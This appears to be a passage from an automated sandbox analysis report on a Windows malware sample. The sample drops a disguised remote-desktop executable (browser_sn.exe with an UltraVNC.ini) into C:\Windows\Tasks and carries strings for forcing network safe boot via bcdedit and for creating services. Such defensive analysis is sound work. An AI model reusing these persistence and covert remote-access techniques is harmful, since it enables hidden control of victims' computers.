Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winmm.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: userenv.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wtsapi32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dwmapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winsta.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: napinsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: pnrpnsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wshbth.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: nlaapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winrnr.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wldp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched20.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: usp10.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: msls31.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: winmm.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: version.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: userenv.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: dwmapi.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: napinsp.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: wshbth.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: nlaapi.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: mswsock.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: winrnr.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | File written: C:\Windows\Tasks\UltraVNC.ini
Source: C:\Windows\Tasks\browser_sn.exe | File opened: C:\Windows\SYSTEM32\RICHED32.DLL
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: T8xrZb7nBL.exe | Static file information: File size 1670955 > 1048576
Source: Binary string: conhost.pdbUGP source: T8xrZb7nBL.exe, 00000000.00000003.1421234001.0000000002754000.00000004.00000020.00020000.00000000.sdmp, uqVb3.kkb9h.2.dr, uqVb3.kkb9h.0.dr, conhost.exe.8.dr
Source: Binary string: conhost.pdb source: T8xrZb7nBL.exe, 00000000.00000003.1421234001.0000000002754000.00000004.00000020.00020000.00000000.sdmp, uqVb3.kkb9h.2.dr, uqVb3.kkb9h.0.dr, conhost.exe.8.dr
Source: uqVb3.kkb9h.0.dr | Static PE information: 0x998FF43F [Tue Aug 22 20:17:03 2051 UTC]
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
Source: T8xrZb7nBL.exe | Static PE information: real checksum: 0x2af97 should be: 0x1a1b11
Source: uqVb3.kkb9h.0.dr | Static PE information: section name: .didat
Source: uqVb3.kkb9h.2.dr | Static PE information: section name: .didat
Source: conhost.exe.8.dr | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Code function: 0_2_00413660 push eax; ret 0_2_0041368E
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B9DC01 push rcx; ret 23_2_00007FF6C2B9DC02
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA1400 push rbp; iretd 23_2_00007FF6C2BA1401
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B9DC11 push rax; ret 23_2_00007FF6C2B9DC13
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B9DC21 push rsp; ret 23_2_00007FF6C2B9DC23
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BB8CF9 push 8B481074h; iretd 23_2_00007FF6C2BB8CFF
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA12EF push rbp; iretd 23_2_00007FF6C2BA12F0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BA07F8 push rbp; iretd 23_2_00007FF6C2BA07F9
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B8FEF1 push rcx; ret 23_2_00007FF6C2B8FEF2
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B9DC01 push rcx; ret 27_2_00007FF6C2B9DC02
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BA1400 push rbp; iretd 27_2_00007FF6C2BA1401
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B9DC11 push rax; ret 27_2_00007FF6C2B9DC13
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B9DC21 push rsp; ret 27_2_00007FF6C2B9DC23
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BB8CF9 push 8B481074h; iretd 27_2_00007FF6C2BB8CFF
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BA12EF push rbp; iretd 27_2_00007FF6C2BA12F0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BA07F8 push rbp; iretd 27_2_00007FF6C2BA07F9
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B8FEF1 push rcx; ret 27_2_00007FF6C2B8FEF2

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | Executable created and started: C:\Windows\Tasks\browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\Xv6Ya.d8LhT
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9h
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\uqVb3.kkb9h
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\conhost.exe
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\DygIR.vkc0f
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\DygIR.vkc0f
Source: Xv6Ya.d8LhT.2.dr | Binary or memory string: bcdedit.exe
Source: Xv6Ya.d8LhT.2.dr | Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: browser_sn.exe.8.dr | Binary or memory string: bcdedit.exe
Source: browser_sn.exe.8.dr | Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: Xv6Ya.d8LhT.0.dr | Binary or memory string: bcdedit.exe
Source: Xv6Ya.d8LhT.0.dr | Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BD7BD0 GetPrivateProfileIntA,23_2_00007FF6C2BD7BD0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BD7C90 GetPrivateProfileIntA,23_2_00007FF6C2BD7C90
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B8E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat23_2_00007FF6C2B8E1D0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2B881AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin23_2_00007FF6C2B881AD
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BD9A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,23_2_00007FF6C2BD9A40
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BD77F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,23_2_00007FF6C2BD77F0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BD7750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,23_2_00007FF6C2BD7750
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BD7F50 GetPrivateProfileIntA,23_2_00007FF6C2BD7F50
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BD78E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,23_2_00007FF6C2BD78E0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BD7E10 GetPrivateProfileIntA,23_2_00007FF6C2BD7E10
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BD7D50 GetPrivateProfileIntA,23_2_00007FF6C2BD7D50
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BD7EB0 GetPrivateProfileIntA,23_2_00007FF6C2BD7EB0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 23_2_00007FF6C2BD7650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,23_2_00007FF6C2BD7650
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BD7BD0 GetPrivateProfileIntA,27_2_00007FF6C2BD7BD0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BD7C90 GetPrivateProfileIntA,27_2_00007FF6C2BD7C90
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B8E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat27_2_00007FF6C2B8E1D0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2B881AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin27_2_00007FF6C2B881AD
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BD9A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,27_2_00007FF6C2BD9A40
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BD77F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,27_2_00007FF6C2BD77F0
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BD7750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,27_2_00007FF6C2BD7750
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BD7F50 GetPrivateProfileIntA,27_2_00007FF6C2BD7F50
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 27_2_00007FF6C2BD78E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,27_2_00007FF6C2BD78E0
